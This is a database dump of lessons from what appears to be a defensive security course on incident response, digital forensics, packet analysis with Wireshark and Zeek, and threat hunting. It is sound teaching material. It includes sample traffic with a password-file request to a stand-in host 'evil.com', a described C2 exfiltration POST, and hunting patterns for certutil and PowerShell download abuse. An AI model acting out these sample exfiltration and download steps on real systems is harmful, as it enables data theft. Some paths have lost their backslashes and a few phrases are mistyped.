cycle. The \"Lessons Learned\" feed back into \"Preparation\".\n*   \"We got hacked because we didn\'t have MFA.\"\n*   Lesson: Need MFA.\n*   Preparation: Implement MFA.\n*   Result: Next time, that attack fails.\n\n### Alternative Model: SANS PICERL\nSANS breaks it down slightly differently (6 steps):\n1.  **P**reparation\n2.  **I**dentification (Detection)\n3.  **C**ontainment\n4.  **E**radication\n5.  **R**ecovery\n6.  **L**essons Learned', 'markdown', 15, '2025-12-26 23:03:48', '2025-12-29 15:08:46'),
(605, 273, '## Phase 1: Preparation - The Shield\n\nPreparation is everything. \"Sweat more in training, bleed less in battle.\"\n\n### 1. Policy & Procedure\n*   **Incident Response Policy**: A high-level document signed by the CEO authorizing the CSIRT to act. (e.g., \"CSIRT has the authority to disconnect *any* system, even the CEO\'s laptop, if infected\").\n*   **Playbooks (Runbooks)**: Detailed step-by-step guides for specific scenarios.\n    *   *Phishing Playbook*: 1. Verify sender. 2. Delete email. 3. Check clicks.\n    *   *Ransomware Playbook*: 1. Isolate host. 2. Verify backups. 3. Contact Legal.\n\n### 2. Tools & Resources\nYou cannot install tools *during* the breach. You need them ready.\n*   **Communication**: Out-of-Band methods. If the hackers own your Email server and Slack, how do you talk? (Signal, WhatsApp, Personal emails).\n*   **War Room**: A physical or virtual room where the team gathers.\n*   **Forensic Workstations**: Laptops ready to analyze evidence.\n*   **Jump Kits**: USB drives with static binaries (triage tools) that you can plug into an infected machine.\n\n### 3. The Baseline\nYou cannot know what is \"Abnormal\" if you don\'t know what is \"Normal\".\n*   What ports are usually open?\n*   What is the average CPU usage?\n*   list of authorized Admins.\n*   **Network Diagram**: Essential. You can\'t defend a network if you don\'t know it exists.\n\n### 4. Training\n*   **Tabletop Exercises (TTX)**: Simulation games. The team sits in a room and talks through a scenario.\n    *   Moderator: \"Scenario: The CFO\'s laptop is encrypted and demanding Bitcoin. Go.\"\n    *   Analyst: \"I isolate the host.\"\n    *   Moderator: \"The host is off-site. You can\'t reach it.\"\n    *   Analyst: \"Oh... uh...\"\n    *   *Result*: Gap identified! Need a way to isolate off-site hosts.', 'markdown', 15, '2025-12-26 23:03:48', '2025-12-29 15:08:46'),
(606, 274, '## Phase 2: Detection & Analysis - The Alarm\n\nThis is the phase where the \"Boom\" happens (or where we notice it).\n\n### Vectors of Detection\n*   **Users**: \"My computer is acting weird.\" \"I clicked a link and now I have a popup.\"\n*   **SIEM**: \"Correlation Rule: Malware Beacon detected.\"\n*   **Third Party**: \"FBI calls and says they found your data on the Dark Web.\" (The worst way to find out).\n\n### Triage (The ER Doctor)\nWhen an alert triggers, you must Triage.\n1.  **Validate**: Is it real? (False Positive check).\n2.  **Categorize**:\n    *   *Category*: Malware, Denial of Service, Unauthorized Access, Harassment.\n3.  **Prioritize**:\n    *   *Impact*: High/Med/Low.\n    *   *Urgency*: High/Med/Low.\n    *   *Scenario*:\n        *   Ransomware on CEO laptop -> **Critical**.\n        *   Adware on a Guest WiFi laptop -> **Low**.\n\n### Scoping\nOnce confirmed, you need to determine the **Blast Radius**.\n*   \"We found malware on Host A. Is it also on Host B? C? D?\"\n*   Check SIEM for similar traffic.\n*   Check File Hashes on entire fleet.\n*   **Golden Rule**: Assume you only developed 10% of the breach. Keep digging.\n\n### Analysis\n*   Forensics: Disk and Memory analysis.\n*   Malware Analysis: Reverse engineering samples found.\n*   Log Analysis: Tracing the attacker\'s lateral movement.\n\n### Documentation during Analysis\nEvery command you run, every file you touch, you must **Document**.\n*   \"10:05 AM: Reviewed firewall logs.\"\n*   \"10:10 AM: Isolated Host A.\"\n*   \"10:25 AM: Found sample in C:Temp.\"\nThis is crucial for legal reasons later.', 'markdown', 15, '2025-12-26 23:03:48', '2025-12-29 15:08:46'),
(607, 275, '## Phase 3: Containment - Stop the Bleeding\n\nThe virus is inside. You have identified it. Now stop it from spreading.\n\n### Short-Term Containment\nImmediate action to stop damage.\n*   **Network Isolation**: Unplug the ethernet cable. Disable the switch port. Use EDR \"Network Isolate\" feature.\n*   **Shutdown**: Generally **BAD IDEA** because it destroys RAM (Memory evidence). Only shut down if the drive is actively being encrypted (Ransomware) and you can\'t stop it otherwise.\n*   **Firewall Block**: Block the C2 IP addresses at the perimeter.\n\n### Long-Term Containment\nFixing the temporary patches.\n*   Apply patches to the vulnerability.\n*   Change passwords for compromised accounts.\n*   Strengthen firewall rules.\n\n### Checkmate: The Attacker\'s Response\nBe careful. Attackers monitor your response.\n*   If you block their IP, they might get angry and deploy Ransomware immediately (The \"Scorched Earth\" policy).\n*   Sometimes, you might want to **Watch and Wait** (Sandboxing the attacker) to learn their TTPs before cutting them off. This requires high skill and confidence.\n\n### Evidence Preservation\nDuring containment, you must preserve evidence.\n*   **Chain of Custody**: A log of who held the hard drive, when, and where.\n*   Make forensic images of the disk *before* you wipe anything.\n*   Dump memory (RAM) before rebooting.', 'markdown', 15, '2025-12-26 23:03:48', '2025-12-29 15:08:46'),
(608, 276, '## Phase 4: Eradication & Recovery - Clean Up\n\n### Eradication\nThe threat is contained. Now remove it.\n1.  **Re-imaging**: The old way was \"run Antivirus and hope it cleans it.\" The Modern way is **Nuke and Pave**.\n    *   Wipe the drive.\n    *   Re-install OS from a verified clean \"Golden Image\".\n2.  **Sanitization**:\n    *   Remove malicious emails from users\' inboxes.\n    *   Reset passwords (force global reset if Active Directory was compromised).\n3.  **Improve Defenses**:\n    *   The attacker got in via RDP? Disable RDP.\n    *   They used a vulnerability? Patch it.\n\n### Recovery\nBringing systems back online.\n1.  **Prioritization**: Restore business-critical systems first (ERP, Email) > secondary systems.\n2.  **Validation**: Before reconnecting to the internet, **monitor** the restored system. Is it beaconing again? (Attackers often hide \"persistence\" triggers).\n3.  **Data Restoration**: Restore data from clean backups.\n    *   *Risk*: What if the backup also contains the malware? You must scan backups before restoring.\n\n### The \"Screaming Test\"\nSometimes, you disable a compromised account and wait to see who screams (which service breaks). This helps identify hidden dependencies.', 'markdown', 15, '2025-12-26 23:03:48', '2025-12-29 15:08:46'),
(609, 277, '## Phase 5: Post-Incident Activity - The Debrief\n\nThe dust has settled. The bad guys are gone. Time for the \"Hot Wash\" or \"Post-Mortem\".\n\n### The Report\nYou must produce a final Incident Report.\n*   **Executive Summary**: Non-technical. \"We were hacked. It cost $50k. It\'s over. Here is the risk.\"\n*   **Timeline**: detailed, second-by-second account.\n*   **Technical Findings**: How they got in (Root Cause), what they took.\n*   **Recommendations**: The \"To-Do\" list to fix the holes.\n\n### The Root Cause Analysis (RCA)\nUse the \"5 Whys\" technique.\n*   **Problem**: Server was hacked.\n    *   *Why?* Vulnerability in Apache was exploited.\n    *   *Why?* It wasn\'t patched.\n    *   *Why?* The patching script failed.\n    *   *Why?* The server disk was full, so the update failed.\n    *   *Why?* No one monitors disk space on Dev servers.\n*   **Root Cause**: Lack of monitoring on Dev servers.\n*   **Fix**: Implement monitoring on all servers.\n\n### Updating the Organization\n*   **Metrics**: Time to Detect (TTD), Time to Respond (TTR). Did we improve?\n*   **Playbook Updates**: \"Our Ransomware playbook didn\'t say who to call at the ISP. We wasted 1 hour finding the number. Update the playbook.\"\n*   **Evidence Retention**: How long do we keep the forensic images? (Usually years, for legal reasons).\n\n### Closing\nThe goal of this phase is not to blame (Finger Pointing), but to improve (System Strengthening). If you skip this, you WILL be hacked again by the same technique.', 'markdown', 15, '2025-12-26 23:03:48', '2025-12-29 15:08:46'),
(610, 278, '## Module 27 Review\nYou have learned the NIST IR Cycle:\n1.  **Prep**: Be ready.\n2.  **Detect**: Find it.\n3.  **Contain**: Stop it. (Isolate).\n4.  **Eradicate/Recover**: Fix it.\n5.  **Post-Incident**: Learn from it.\n\nNext: Digital Forensics (The science of evidence preservation).', 'markdown', 15, '2025-12-26 23:03:48', '2025-12-29 14:19:16'),
(611, 281, '## What is Digital Forensics?\n\n**Digital Forensics** is the science of identifying, preserving, recovering, analyzing, and presenting facts about digital evidence. It is CSI for computers.\n\n### The Goal\nThe goal is not just \"Find the bad guy\". It is to answer the W-questions:\n*   **Who** did it? (Attribution).\n*   **What** did they do? (Actions).\n*   **When** did it happen? (Timeline).\n*   **How** did they get in? (Root Cause).\n\n### Forensic Soundness (Admissibility)\nIn a court of law, evidence must be **admissible**.\n*   If you boot up the suspect\'s laptop to look around, you have modified the evidence (timestamps changed, temporary files created). A defense lawyer will argue: \"The analyst tampered with the device. The malware could have been planted by the analyst.\"\n*   **Rule #1**: Never work on the original evidence. Always work on a forensic copy (Image).\n*   **Rule #2**: Verify integrity using Hashes.\n\n### Types of Forensics\n1.  **Disk Forensics**: Analyzing hard drives, USBs. (Finding deleted files).\n2.  **Memory Forensics**: Analyzing RAM. (Finding running malware, encryption keys, chat logs).\n3.  **Network Forensics**: Analyzing PCAPs and logs.\n4.  **Mobile Forensics**: iOS/Android analysis.\n\n### Locard\'s Exchange Principle\n\"Every contact leaves a trace.\"\nIn the physical world, a burglar leaves fingerprints and takes mud on their shoes.\nIn the digital world, a hacker leaves logs, registry keys, and cache files, and takes data. It is impossible to interact with a system without changing it.', 'markdown', 15, '2025-12-26 23:05:09', '2025-12-29 15:09:09'),
(612, 282, '## Live vs. Dead Forensics & Order of Volatility\n\nWhen you approach a compromised machine, you have a choice: pull the plug or analyze it live?\n\n### Order of Volatility (RFC 3227)\nData disappears at different rates when power is lost. You must capture the most volatile data *first*.\n\n1.  **CPU Registers, Cache** (Nanoseconds). *Identical to impossible to capture usually.*\n2.  **System Memory (RAM)** (Seconds). *Contains keys, passwords, unsaved documents, running processes.*\n3.  **Network State** (Seconds). *Active connections to the hacker.*\n4.  **Running Processes** (Seconds).\n5.  **Disk (HDD/SSD)** (Years). *Files, Logs.*\n6.  **Remote Logs / Backups** (Years).\n7.  **Physical Configuration** (Forever).\n\n**Golden Rule**: If you pull the plug, **RAM is gone forever**. If the disk was encrypted (BitLocker) and the key was in RAM, you have locked yourself out permanently.\n\n### Dead Forensics (Post-Mortem)\n*   System is powered off.\n*   Hard drive is removed.\n*   Imaged using a Write Blocker.\n*   Analyzed in a lab.\n*   *Pros*: Safe, no risk of altering data.\n*   *Cons*: No RAM, no network state. Rootkits are inactive (harder to see).\n\n### Live Forensics\n*   System is running.\n*   You insert a USB with trusted tools (DumpIt, FTK Imager Lite).\n*   You dump RAM and run triage scripts.\n*   *Pros*: Captures encryption keys, active connections.\n*   *Cons*: **You alter the system**. Inserting a USB changes the registry. Running a tool consumes RAM. You must document *exactly* what you did to explain the changes in court.', 'markdown', 15, '2025-12-26 23:05:09', '2025-12-29 15:09:09');
INSERT INTO `lesson_content` (`id`, `task_id`, `content`, `content_type`, `reading_time_minutes`, `created_at`, `updated_at`) VALUES
(613, 283, '## Evidence Handling & Chain of Custody\n\nIf you cannot prove who held the evidence, the evidence is worthless.\n\n### Chain of Custody (CoC)\nA legal document that tracks the life of a piece of evidence.\n*   **Fields**:\n    *   Item Description: \"Seagate 1TB HDD, Serial #XYZ\".\n    *   Date/Time: \"2023-10-27 14:00\".\n    *   Released By: \"John Doe (Analyst)\".\n    *   Received By: \"Jane Smith (Evidence Locker Manager)\".\n    *   Reason: \"Overnight Storage\".\n*   **Gap in Chain**: If the drive was logged out on Friday and logged back in on Monday, but nobody signed for it over the weekend, the Defense will say: \"Someone replaced the drive.\" Case dismissed.\n\n### Evidence Integrity (Hashing)\nHow do we prove the file hasn\'t changed in 5 years? **Hashing**.\n*   **MD5 / SHA1**: Old, broke. (Collisions possible).\n*   **SHA256**: The standard.\n*   **Procedure**:\n    1.  Acquire the drive image.\n    2.  Calculate SHA256 immediatey. (e.g., `A1B2...`).\n    3.  Record `A1B2...` in the CoC.\n    4.  Six months later in court, hash the drive again.\n    5.  It MUST match `A1B2...` exactly. If one bit changed, the hash changes completely.\n\n### The Evidence Locker\n*   Physical security.\n*   Restricted access (Badge in/out).\n*   Faraday Bags: Bags lined with metal mesh to block radio signals. Use these for Mobile Phones (so they don\'t receive a \"Remote Wipe\" command from the iCloud/Google).', 'markdown', 15, '2025-12-26 23:05:09', '2025-12-29 15:09:09'),
(614, 284, '## Disk Imaging & Acquisition\n\nCopying a file (`Ctrl+C, Ctrl+V`) is NOT forensic acquisition. Copying only copies the *active* data. It ignores \"Slack Space\" and \"Deleted Files\".\n\n### Forensic Image\nA bit-by-bit clone of the drive. It copies every 0 and 1, including the empty space (where deleted files live).\n*   **Formats**:\n    *   **.dd (Raw)**: Pure dump.\n    *   **.E01 (EnCase)**: The industry standard. Includes compression, password protection, and metadata (Case number, Investigator Name) inside the file header.\n\n### Write Blockers\nA hardware device that sits between the suspect drive and your computer.\n*   **Function**: It physically cuts the \"Write\" wire. Data can flow *from* the suspect drive, but NOTHING can flow *to* it.\n*   **Mandatory**: If you attach a Windows drive to your PC without a blocker, Windows will automatically mount it, update \"Last Access\" timestamps, create \".Trash\" folders, and corrupt the evidence instantly.\n\n### Tools\n*   **FTK Imager**: Free, standard. can capture RAM and Disk.\n*   **Guymager (Linux)**: fast open source imager.\n*   **dd**: The classic Linux command. `dd if=/dev/sda of=/evidence/image.dd`.\n\n### Verification\nAfter imaging, the Imager will automatically hash the Source (Physical Drive) and the Destination (Image File). They must match.', 'markdown', 15, '2025-12-26 23:05:09', '2025-12-29 15:09:09'),
(615, 285, '## File System Analysis: NTFS & Timestamps\n\nThe file system acts as the librarian of the drive.\n\n### NTFS (New Technology File System)\nThe standard Windows file system.\n*   **$MFT (Master File Table)**: The heart of NTFS. It is a hidden file that contains a record for *every* file on the drive.\n    *   It stores: File Name, Size, Permissions, Timestamps, and **Physical Location** on disk.\n*   **Resident Files**: If a file is very small (< 700 bytes), NTFS stores the content *directly inside the MFT record* to save space.\n*   **Deleted Files**:\n    *   When you delete a file, Windows does NOT erase the data.\n    *   It simply marks the MFT entry as \"Free\".\n    *   The data stays on the disk until a new file overwrites it. This is why forensics can recover deleted files.\n\n### Timestamps (MAC Times)\nEvery file has 4 timestamps (Standard MAC + Entry Modified).\n*   **M**odified: Content changed. (e.g., \"Save\" in Word).\n*   **A**ccessed: File read/opened. (Looking at a picture).\n*   **C**reated: File created on *this* volume. (Moving a file updates Created Date!).\n*   **B**orn (Entry Modified): The MFT record changed.\n\n### Time Stomping\nAttackers can use tools (like `touch` or `SetMace`) to modify timestamps to hide their tracks.\n*   *Detection*: Often they miss the \"nanosecond\" precision or the $FileName attribute (NTFS has two sets of timestamps: $Standard_Information and $FileName). If they mismatch, it\'s stomping.', 'markdown', 15, '2025-12-26 23:05:09', '2025-12-29 15:09:09'),
(616, 286, '## Windows Artifacts: Where the Secrets Hides\n\nWindows is a messy roommate. It keeps records of *everything* you do to improve \"User Experience\". Forensics exploits this.\n\n### 1. Prefetch\n*   **Location**: `C:WindowsPrefetch`\n*   **Purpose**: Speed up app loading.\n*   **Artifact**: Shows **Name of Executable** run, **First/Last Run Time**, and **Run Count**.\n*   **Use**: \"Did the suspect run CCleaner? Yes, 5 times. Last time was 10 minutes before we arrived.\"\n\n### 2. ShimCache (AppCompatCache)\n*   **Location**: Registry (SYSTEM hive).\n*   **Purpose**: Compatibility settings for old apps.\n*   **Artifact**: Tracks executables present on the system, even if they were deleted.\n*   **Use**: Proving that `malware.exe` existed on the system in the past.\n\n### 3. Jump Lists & LNK Files\n*   **Location**: User Profile.\n*   **Purpose**: \"Recent Files\" in Taskbar/Start Menu.\n*   **Artifact**: Shows files accessed by the user.\n*   **Use**: \"The user opened `stolen_plans.pdf` from a USB drive `E:`.\"\n\n### 4. Registry Hives\n*   **SAM**: User accounts, password hashes.\n*   **SYSTEM**: System config, Timezone, USB history (**USBStor** - proves a specific USB serial number was plugged in).\n*   **SOFTWARE**: Installed programs, Versions.\n*   **NTUSER.DAT**: Per-user settings. \"Recent Docs\", Search History, Typed URLs in IE/Explorer.\n\n### 5. Amcache.hve\n*   **Use**: Stores SHA1 hashes of executed programs.\n*   **Golden**: You can map a file hash to a timestamp of execution.\n\n### 6. Shellbags\n*   **Location**: Registry (USRCLASS.DAT).\n*   **Use**: Tracks which **Founders/Directories** the user browsed in Explorer.\n*   **Power**: It persists even if the folder is deleted. You can construct a map of the user\'s file system knowledge.', 'markdown', 15, '2025-12-26 23:05:09', '2025-12-29 15:09:09'),
(617, 287, '## Module 28 Review\nYou have scraped the surface of Digital Forensics:\n1.  **CoC**: Protect the evidence integrity.\n2.  **Imaging**: Use a Write Blocker.\n3.  **Artifacts**: Windows creates trails (Prefetch, Registry, LNK) for everything you do.\n\nNext: Network Traffic Analysis (Packet Inspection).', 'markdown', 15, '2025-12-26 23:05:09', '2025-12-29 14:19:16'),
(618, 291, '## Why Analyze Network Traffic?\n\nNetwork Traffic Analysis (NTA) is looking at the wire. \"The Packet Never Lies.\" Logs can be deleted; Endpoints can be rootkitted to hide processes; but if data was sent, the packets existed.\n\n### The Scope\n*   **North/South**: Traffic entering/leaving your network (Internet). Found at the Firewall/Gateway.\n*   **East/West**: Traffic moving between internal servers. Found at Core Switches (Internal Taps).\n\n### The Challenge: Encryption\n90% of web traffic is HTTPS (TLS encrypted).\n*   **Problem**: We can\'t see the payload. We don\'t know if the user downloaded a cat picture or malware.\n*   **Solution 1**: **SSL Inspection (Decryption)**. A proxy intercepts traffic, decrypts it, inspects it, re-encrypts it. Expensive and raises privacy/legal issues (Banking/Healthcare).\n*   **Solution 2**: **Traffic Metadata Analysis**. (JA3).\n    *   Even encrypted info has fingerprints.\n    *   The \"Client Hello\" packet in TLS sends specific cipher suites.\n    *   A standard Chrome Browser sends one set.\n    *   The \"Metasploit\" hacking tool sends a different set.\n    *   JA3 creates a hash of this handshake to identify the *application* even if the *content* is encrypted.\n\n### Use Cases\n*   Detecting C2 Beaconing.\n*   Finding Data Exfiltration (Large uploads).\n*   Spotting scanning activity.', 'markdown', 15, '2025-12-26 23:06:44', '2025-12-29 15:09:09'),
(619, 292, '## Packet Capture (PCAP) Fundamentals\n\nA PCAP file contains the raw data captured from the network card.\n\n### The TCP 3-Way Handshake\nTo understand traffic, you must understand TCP.\n1.  **SYN**: \"Hi, I want to connect.\" (Client -> Server)\n2.  **SYN-ACK**: \"Okay, I see you. I\'m ready.\" (Server -> Client)\n3.  **ACK**: \"Great, let\'s go.\" (Client -> Server)\n\n**Analyst Check**:\n*   If you see lots of SYNs but no SYN-ACKs? -> **SYN Flood (DoS)** or **Port Scan** (host is down).\n*   If you see SYN, SYN-ACK, RST? -> Connection rejected.\n\n### TCP Flags (The Signal Flags)\n*   **SYN**: Synchronize. Start.\n*   **ACK**: Acknowledge. Confirm.\n*   **FIN**: Finish. Graceful exit. (\"I\'m done, goodbye\").\n*   **RST**: Reset. Abort. (\"Get lost\" or \"I crashed\").\n*   **PSH**: Push. Send data now.\n\n### Protocol Hierarchy\n1.  **Ethernet**: MAC Addresses. (Local Network).\n2.  **IP**: IP Addresses. (Internet).\n3.  **TCP/UDP**: Ports. (Application Service).\n4.  **Application**: HTTP, DNS, SMB. (The Data).\n\nWhen analyzing, work up the stack. First check IP (Who?), then Port (What Service?), then App (What Content?).', 'markdown', 15, '2025-12-26 23:06:44', '2025-12-29 15:09:09'),
(620, 293, '## Wireshark Essentials\n\nWireshark is the microscope for packets.\n\n### 1. Capture Filters vs. Display Filters\n*   **Capture Filters (BPF)**: Set *before* you record. Discards packets.\n    *   `host 192.168.1.1` -> Only save packets involving this IP.\n    *   **Pro**: saves disk space. **Con**: If you didn\'t capture it, you can\'t see it later.\n*   **Display Filters**: Set *after* recording. Just hides packets from view.\n    *   `ip.addr == 192.168.1.1`\n    *   **Pro**: Flexible. Non-destructive.\n\n### 2. Essential Display Filters\n*   `http.request.method == \"POST\"`: Show me data uploads.\n*   `tls.handshake.type == 1`: Show me HTTPS Client Hellos (domain names).\n*   `dns.flags.response == 0`: Show me DNS queries.\n*   `tcp.flags.syn == 1 and tcp.flags.ack == 0`: Show me connection attempts.\n\n### 3. Follow TCP Stream\nRight-click a packet -> \"Follow TCP Stream\".\n*   Wireshark reassembles the conversation.\n*   Instead of seeing 50 packets, you see the reconstructed text:\n    *   `GET /passwords.txt HTTP/1.1`\n    *   `Host: evil.com`\n    *   `...`\n\n### 4. Export Objects\nFile -> Export Objects -> HTTP.\n*   Wireshark can extract files downloaded in the traffic.\n*   \"Oh, the user downloaded `virus.exe`? I can save that file from the PCAP to my desktop and hash it.\"', 'markdown', 15, '2025-12-26 23:06:44', '2025-12-29 15:09:09'),
(621, 294, '## Analyzing HTTP Traffic\n\nHTTP is the language of the web (and most malware).\n\n### The Request\n*   **Method**:\n    *   GET: Retrieve data.\n    *   POST: Send data (Logins, Uploads). **Focus on POSTs**.\n*   **User-Agent**: Who is asking?\n    *   `Mozilla/5.0... Chrome/90...`: Normal Browser.\n    *   `Python-urllib/3.0`: Python Script. (Suspicious on a user laptop).\n    *   `Struts-Shock`: Exploit tool.\n*   **Host**: The domain.\n*   **Referer**: Where did you come from? (Did you click a link on Google, or a link on a Phishing site?)\n\n### The Response\n*   **Status Codes**:\n    *   `200 OK`: Success.\n    *   `301/302`: Redirect.\n    *   `401/403`: Unauthorized. (Brute Force?)\n    *   `404`: Not Found. (Scanning?)\n    *   `500`: Server Error. (Exploit crashed the server?)\n\n### Analysis Scenario\n1.  **Alert**: \"Suspicious User-Agent\".\n2.  **Packet**: `POST /upload.php` from IP 10.10.10.5. User-Agent: `DarkSides/1.0`.\n3.  **Stream**: The content of the POST is a large blob of encrypted data.\n4.  **Verdict**: C2 Exfiltration.', 'markdown', 15, '2025-12-26 23:06:44', '2025-12-29 15:09:09'),
(622, 295, '## Detecting Malicious Traffic\n\nWhat does \"Bad\" look like on the wire?\n\n### 1. Beaconing (Heartbeats)\n*   **Regularity**: Every 60 seconds (Delta Time).\n*   **Small Size**: Packets are identical in size.\n*   **Jitter**: Sophisticated beacons add randomization (60s, 62s, 58s).\n\n### 2. Data Exfiltration\n*   **Large Outbound**: Internal IP sending GBs to External IP.\n*   **Protocol Misuse**:\n    *   **DNS Tunneling**: Huge volume of DNS queries to the same domain.\n    *   **ICMP Tunneling**: Ping packets containing data payloads instead of \"abcdefg\".\n*   **Steganography**: Hiding data inside images. (Hard to detect on wire without payload analysis).\n\n### 3. Scanning\n*   **Port Scan**: One IP sending SYNs to 1000 ports on one target.\n*   **Net Scan**: One IP sending SYNs to Port 445 on 1000 targets.\n\n### 4. Cleartext Credential Leaks\n*   **FTP / Telnet / HTTP (Basic Auth)**: Passwords sent in clear text.\n*   **Analyst**: \"Follow Stream\". Search for \"Password\" or \"Pass\".', 'markdown', 15, '2025-12-26 23:06:44', '2025-12-29 15:09:09'),
(623, 296, '## Zeek (formerly Bro)\n\nWireshark is great for 1 packet. Zeek is great for 1 million packets.\n\n### What is Zeek?\nIt acts like a NIDS, but instead of \"Alerting\", it generate **Transaction Logs**.\nIt summarizes traffic into readable Tab-Separated Values (TSV) logs.\n\n### Key Logs\n*   **conn.log**: All TCP/UDP connections. (Source, Dest, Duration, Bytes).\n*   **http.log**: All HTTP requests (URI, User-Agent, Referrer).\n*   **dns.log**: All DNS queries.\n*   **ssl.log**: SSL certificates seen.\n\n### Why use it?\nNTA with Zeek is faster.\n*   **Question**: \"Did anyone visit `evil.com`?\"\n*   *Wireshark*: Open 50GB pcap, wait 10 minutes to load, filter `dns contains evil`.\n*   *Zeek*: `grep \"evil.com\" dns.log`. (Instant).', 'markdown', 15, '2025-12-26 23:06:44', '2025-12-29 14:20:29'),
(624, 297, '## Module 29 Review\nNTA gives you the ground truth.\n*   **Wireshark** for deep inspection of a single stream.\n*   **Zeek** for high-level logging of all traffic.\n*   **HTTPS** hides content, but metadata (JA3, certificates, size) still reveals a lot.\n\nNext: Proactive defense with Threat Hunting.', 'markdown', 15, '2025-12-26 23:06:44', '2025-12-29 14:20:29'),
(625, 301, '## What is Threat Hunting?\n\n**Threat Hunting** is the proactive search for cyber threats that are lurking undetected in a network.\n\n### The Problem with Passive Defense\nTraditional security (SIEM, EDR, IDS) is **Reactive**.\n*   It waits for an alarm to go off.\n*   \"If Signature X matches, Send Alert.\"\n*   **The Flaw**: Sophisticated attackers (APTs) use custom tools and \"Living off the Land\" techniques (PowerShell, WMI) that do NOT trigger signatures. They can dwell in a network for **months** (Average Dwell Time is ~200 days).\n\n### The Hunter\'s Mindset\nThreat Hunting is **Proactive**.\n*   **Analogy**:\n    *   **Reactive**: Waiting for your burglar alarm to ring.\n    *   **Proactive**: Walking around your house with a baseball bat, checking under the beds, even though the alarm didn\'t ring.\n*   **Assumption**: \"We are already compromised. I just haven\'t found it yet.\"\n\n### Who hunts?\n*   It requires a human analyst. AI cannot hunt (yet) because hunting requires **Creativity** and **Intuition**.\n*   \"That admin logged in at 2 AM. It\'s not an alert because he *is* an admin. But I know he\'s on vacation in Hawaii. That\'s suspicious.\"\n\n### The Three Pillars of Hunting\n1.  **Triggers**: What starts a hunt? (Intel, Hypothesis).\n2.  **Data**: You can\'t hunt what you can\'t see. (Logs).\n3.  **Tools**: SIEM, EDR, Jupyter Notebooks.', 'markdown', 15, '2025-12-26 23:08:10', '2025-12-29 15:11:15'),
(626, 302, '## Hunting vs. Detection: What\'s the difference?\n\nIt is easy to confuse Incident Response, Detection Engineering, and Threat Hunting.\n\n### 1. Detection Engineering (The Ref)\n*   **Goal**: Automate the known.\n*   **Process**: \"I know Emotet uses this registry key. I will write a SIEM rule for it.\"\n*   **Output**: An Alert (Signature).\n\n### 2. Incident Response (The Firefighter)\n*   **Goal**: Put out the fire.\n*   **Process**: \"The SIEM alerted on Emotet! Delete it! Isolate the host!\"\n*   **Output**: A clean machine.\n\n### 3. Threat Hunting (The Detective)\n*   **Goal**: Find the unknown.\n*   **Process**: \"I wonder if anyone is using PowerShell to download files? There is no rule for it because admins do it too. I will filter the logs and look for anomalies.\"\n*   **Output**:\n    1.  **Nothing** (The network is clean).\n    2.  **An Incident** (I found a hacker! -> Hand off to IR team).\n    3.  **A New Rule** (I found a simplified way to detect this. -> Hand off to Detection Engineers).\n\n### The Cycle\nHunting feeds Detection.\n1.  Hunter finds a new attack pattern manually.\n2.  Hunter explains it to Detection Engineer.\n3.  Engineer writes a rule.\n4.  Now the SIEM detects it automatically.\n5.  Hunter moves on to the next unknown threat.\n\n**Hunting is not just \"looking at logs randomly\".** That is called \"log staring\" and it is useless. Hunting must be structured.', 'markdown', 15, '2025-12-26 23:08:10', '2025-12-29 15:11:15'),
(627, 303, '## The Hunting Loop\n\nTo avoid \"Rabbit Holes\" (wasting 8 hours looking at nothing), hunters follow a loop.\n\n### 1. Hypothesis Generation\n*   Start with a question.\n*   \"If an attacker were inside, how would they move laterally?\"\n*   *Hypothesis*: \"Attackers might be using Windows Admin Shares (C$) to move between PCs.\"\n\n### 2. Data Collection & Processing\n*   \"Do I have logs for this? Yes, Windows Event 5140 (Share Access).\"\n*   \"Is it parsed in Splunk? Yes.\"\n\n### 3. Trigger / Investigation\n*   Run the query.\n*   \"Show me all SMB access to C$ shares.\"\n*   Result: 10,000 events. (Too many).\n*   **Filter**: \"Exclude the Backup Service Admin account.\" -> 500 events.\n*   **Filter**: \"Exclude the Domain Controllers.\" -> 50 events.\n*   **Investigate**: Look at the remaining 50. Are they normal admins?\n\n### 4. Discovery\n*   \"Wait, why is the \'Receptionist\' account accessing the CEO\'s laptop C$ share?\"\n*   **Verdict**: Malicious.\n\n### 5. Enrichment & Automation\n*   \"That was a good catch. Let\'s automate it.\"\n*   Create a rule: \"Alert if Non-IT-Admin accesses C$ share.\"\n\n### Models\n*   **The OODA Loop**: Observe, Orient, Decide, Act.\n*   **Sqrrl’s Hunting Loop**: Create Hypothesis -> Investigate -> Uncover Patterns -> Enrich Analytics.', 'markdown', 15, '2025-12-26 23:08:10', '2025-12-29 15:11:15'),
(628, 304, '## Hypothesis-Driven Hunting\n\nThe most common and effective type of hunting. A hypothesis must be **testable**.\n\n### Good Hypothesis Examples\n*   **Intel-Driven**: \"FireEye published a report saying APT29 uses `certutil.exe` to download malware. *Hypothesis: APT29 is doing that in our network.*\"\n*   **Situational**: \"We just fired a Sysadmin. *Hypothesis: He might have left a backdoor account.*\"\n*   **Domain-Based**: \"We have a lot of PowerShell usage. *Hypothesis: Attackers are using PowerShell Empire C2 agents hiding in plain sight.*\"\n\n### How to build a Hypothesis\nUse the **MITRE ATT&CK Framework**.\n1.  Pick a Tactic (e.g., Persistence).\n2.  Pick a Technique (e.g., Scheduled Tasks).\n3.  Form Hypothesis: \"Attackers are maintaining persistence by creating Scheduled Tasks with random names.\"\n\n### The \"Null\" Hypothesis\nIn science, you try to disprove the Null Hypothesis (\"There is no attacker\").\n*   You are trying to find evidence that rejects the idea that your network is clean.\n\n### Scenario\n*   **News**: A new zero-day in Outlook allows RCE via preview pane.\n*   **Hypothesis**: \"An attacker has exploited this zero-day against our Executives.\"\n*   **Search**: Look for `outlook.exe` spawning child processes like `cmd.exe` or `powershell.exe`.\n*   **Outcome**: Zero results.\n*   **Conclusion**: \"We are likely clean from this specific threat *at this moment*.\" (Record this search so you don\'t repeat it tomorrow).', 'markdown', 15, '2025-12-26 23:08:10', '2025-12-29 15:11:15'),
